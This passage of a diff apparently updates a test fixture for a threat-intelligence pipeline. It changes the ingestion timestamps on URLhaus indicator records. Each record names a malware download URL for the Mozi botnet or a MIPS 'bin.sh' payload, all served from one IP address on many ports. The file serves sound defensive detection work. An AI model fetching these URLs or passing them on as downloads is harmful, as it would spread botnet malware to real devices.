"2021-12-14T14:56:15.726571801Z", "original": "{\"id\":\"961130\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961130/\",\"url\":\"http://89.160.20.156:37771/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:51:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -20227,7 +20227,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027562700Z", + "ingested": "2021-12-14T14:56:15.726572173Z", "original": "{\"id\":\"961131\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961131/\",\"url\":\"http://89.160.20.156:35513/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:51:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -20276,7 +20276,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027569600Z", + "ingested": "2021-12-14T14:56:15.726572625Z", "original": "{\"id\":\"961129\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961129/\",\"url\":\"http://89.160.20.156:53382/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:51:03 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -20325,7 +20325,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027576400Z", + "ingested": "2021-12-14T14:56:15.726573049Z", "original": "{\"id\":\"961128\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961128/\",\"url\":\"http://89.160.20.156:50336/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:50:17 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -20374,7 +20374,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027583300Z", + "ingested": "2021-12-14T14:56:15.726573491Z", "original": "{\"id\":\"961124\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961124/\",\"url\":\"http://89.160.20.156:34233/Mozi.a\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:50:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -20423,7 +20423,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027590200Z", + "ingested": "2021-12-14T14:56:15.726573854Z", "original": "{\"id\":\"961125\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961125/\",\"url\":\"http://89.160.20.156:38392/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:50:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -20472,7 +20472,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027597200Z", + "ingested": "2021-12-14T14:56:15.726574571Z", "original": "{\"id\":\"961126\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961126/\",\"url\":\"http://89.160.20.156:52654/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:50:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -20521,7 +20521,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027604200Z", + "ingested": "2021-12-14T14:56:15.726574988Z", "original": "{\"id\":\"961127\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961127/\",\"url\":\"http://89.160.20.156:60203/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:50:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -20570,7 +20570,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027611200Z", + "ingested": "2021-12-14T14:56:15.726575349Z", "original": "{\"id\":\"961123\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961123/\",\"url\":\"http://89.160.20.156:48091/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:50:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -20619,7 +20619,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027618Z", + "ingested": "2021-12-14T14:56:15.726575712Z", "original": "{\"id\":\"961122\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961122/\",\"url\":\"http://89.160.20.156:40783/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:49:41 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -20668,7 +20668,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027625300Z", + "ingested": "2021-12-14T14:56:15.726576082Z", "original": "{\"id\":\"961121\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961121/\",\"url\":\"http://89.160.20.156:52015/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:49:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -20717,7 +20717,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027632200Z", + "ingested": "2021-12-14T14:56:15.726576614Z", "original": "{\"id\":\"961118\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961118/\",\"url\":\"http://89.160.20.156:42987/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:37:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -20766,7 +20766,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027639300Z", + "ingested": "2021-12-14T14:56:15.726576978Z", "original": "{\"id\":\"961119\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961119/\",\"url\":\"http://89.160.20.156:53388/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:37:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -20815,7 +20815,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027646100Z", + "ingested": "2021-12-14T14:56:15.726577348Z", "original": "{\"id\":\"961120\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961120/\",\"url\":\"http://89.160.20.156:44124/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:37:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -20864,7 +20864,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027653Z", + "ingested": "2021-12-14T14:56:15.726577726Z", "original": "{\"id\":\"961115\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961115/\",\"url\":\"http://89.160.20.156:33802/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:37:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -20913,7 +20913,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027659900Z", + "ingested": "2021-12-14T14:56:15.726578196Z", "original": "{\"id\":\"961116\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961116/\",\"url\":\"http://89.160.20.156:43806/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:37:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -20962,7 +20962,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027666800Z", + "ingested": "2021-12-14T14:56:15.726578619Z", "original": "{\"id\":\"961117\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961117/\",\"url\":\"http://89.160.20.156:52278/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:37:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -21011,7 +21011,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027673700Z", + "ingested": "2021-12-14T14:56:15.726578990Z", "original": "{\"id\":\"961114\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961114/\",\"url\":\"http://89.160.20.156:41202/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:37:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -21060,7 +21060,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027680600Z", + "ingested": "2021-12-14T14:56:15.726579360Z", "original": "{\"id\":\"961113\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961113/\",\"url\":\"http://89.160.20.156:35756/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:36:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -21109,7 +21109,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027687600Z", + "ingested": "2021-12-14T14:56:15.726579785Z", "original": "{\"id\":\"961112\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961112/\",\"url\":\"http://89.160.20.156:40569/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:36:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -21158,7 +21158,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027694600Z", + "ingested": "2021-12-14T14:56:15.726580244Z", "original": "{\"id\":\"961111\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961111/\",\"url\":\"http://89.160.20.156:47645/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:36:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -21207,7 +21207,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027701700Z", + "ingested": "2021-12-14T14:56:15.726580660Z", "original": "{\"id\":\"961110\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961110/\",\"url\":\"http://89.160.20.156:40023/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:35:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -21256,7 +21256,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027708700Z", + "ingested": "2021-12-14T14:56:15.726581031Z", "original": "{\"id\":\"961109\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961109/\",\"url\":\"http://89.160.20.156:53402/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:34:08 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -21306,7 +21306,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027715600Z", + "ingested": "2021-12-14T14:56:15.726581413Z", "original": "{\"id\":\"961108\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961108/\",\"url\":\"http://89.160.20.156:36316/bin.sh\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:29:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"elf\",\"mips\"]}", "category": "threat", "type": "indicator", @@ -21356,7 +21356,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027722500Z", + "ingested": "2021-12-14T14:56:15.726581863Z", "original": "{\"id\":\"961107\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961107/\",\"url\":\"http://89.160.20.156:48105/bin.sh\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:28:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"elf\",\"mips\"]}", "category": "threat", "type": "indicator", @@ -21405,7 +21405,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027729400Z", + "ingested": "2021-12-14T14:56:15.726582363Z", "original": "{\"id\":\"961103\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961103/\",\"url\":\"http://89.160.20.156:40017/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:21:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -21454,7 +21454,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027736300Z", + "ingested": "2021-12-14T14:56:15.726582725Z", "original": "{\"id\":\"961104\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961104/\",\"url\":\"http://89.160.20.156:41906/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:21:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -21503,7 +21503,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027743200Z", + "ingested": "2021-12-14T14:56:15.726583101Z", "original": "{\"id\":\"961105\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961105/\",\"url\":\"http://89.160.20.156:38607/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:21:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -21552,7 +21552,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027750100Z", + "ingested": "2021-12-14T14:56:15.726583462Z", "original": "{\"id\":\"961106\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961106/\",\"url\":\"http://89.160.20.156:59331/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:21:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -21601,7 +21601,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027756900Z", + "ingested": "2021-12-14T14:56:15.726584027Z", "original": "{\"id\":\"961102\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961102/\",\"url\":\"http://89.160.20.156:53932/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:20:24 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -21650,7 +21650,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027765100Z", + "ingested": "2021-12-14T14:56:15.726584389Z", "original": "{\"id\":\"961101\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961101/\",\"url\":\"http://89.160.20.156:58385/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:20:08 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -21699,7 +21699,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027772100Z", + "ingested": "2021-12-14T14:56:15.726584764Z", "original": "{\"id\":\"961099\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961099/\",\"url\":\"http://89.160.20.156:57010/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:20:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -21748,7 +21748,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027779100Z", + "ingested": "2021-12-14T14:56:15.726585131Z", "original": "{\"id\":\"961100\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961100/\",\"url\":\"http://89.160.20.156:59715/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:20:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -21797,7 +21797,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027786Z", + "ingested": "2021-12-14T14:56:15.726585554Z", "original": "{\"id\":\"961094\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961094/\",\"url\":\"http://89.160.20.156:57052/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:20:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -21846,7 +21846,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027793Z", + "ingested": "2021-12-14T14:56:15.726585924Z", "original": "{\"id\":\"961095\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961095/\",\"url\":\"http://89.160.20.156:60550/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:20:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -21895,7 +21895,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027800Z", + "ingested": "2021-12-14T14:56:15.726586305Z", "original": "{\"id\":\"961096\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961096/\",\"url\":\"http://89.160.20.156:39684/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:20:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -21944,7 +21944,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027807Z", + "ingested": "2021-12-14T14:56:15.726586673Z", "original": "{\"id\":\"961097\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961097/\",\"url\":\"http://89.160.20.156:43593/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:20:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -21993,7 +21993,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027813900Z", + "ingested": "2021-12-14T14:56:15.726587036Z", "original": "{\"id\":\"961098\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961098/\",\"url\":\"http://89.160.20.156:36066/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:20:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -22042,7 +22042,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027820800Z", + "ingested": "2021-12-14T14:56:15.726587507Z", "original": "{\"id\":\"961093\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961093/\",\"url\":\"http://89.160.20.156:35006/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:19:09 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -22091,7 +22091,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027827700Z", + "ingested": "2021-12-14T14:56:15.726587870Z", "original": "{\"id\":\"961091\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961091/\",\"url\":\"http://89.160.20.156:38184/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:19:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -22140,7 +22140,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027834600Z", + "ingested": "2021-12-14T14:56:15.726588235Z", "original": "{\"id\":\"961092\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961092/\",\"url\":\"http://89.160.20.156:59027/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:19:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -22189,7 +22189,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027841500Z", + "ingested": "2021-12-14T14:56:15.726588625Z", "original": "{\"id\":\"961090\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961090/\",\"url\":\"http://89.160.20.156:50639/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:19:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -22238,7 +22238,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027850700Z", + "ingested": "2021-12-14T14:56:15.726588993Z", "original": "{\"id\":\"961086\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961086/\",\"url\":\"http://89.160.20.156:33534/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:19:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -22287,7 +22287,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027857800Z", + "ingested": "2021-12-14T14:56:15.726589550Z", "original": "{\"id\":\"961087\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961087/\",\"url\":\"http://89.160.20.156:36316/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:19:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -22336,7 +22336,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.027865700Z", + "ingested": "2021-12-14T14:56:15.726589913Z", "original": 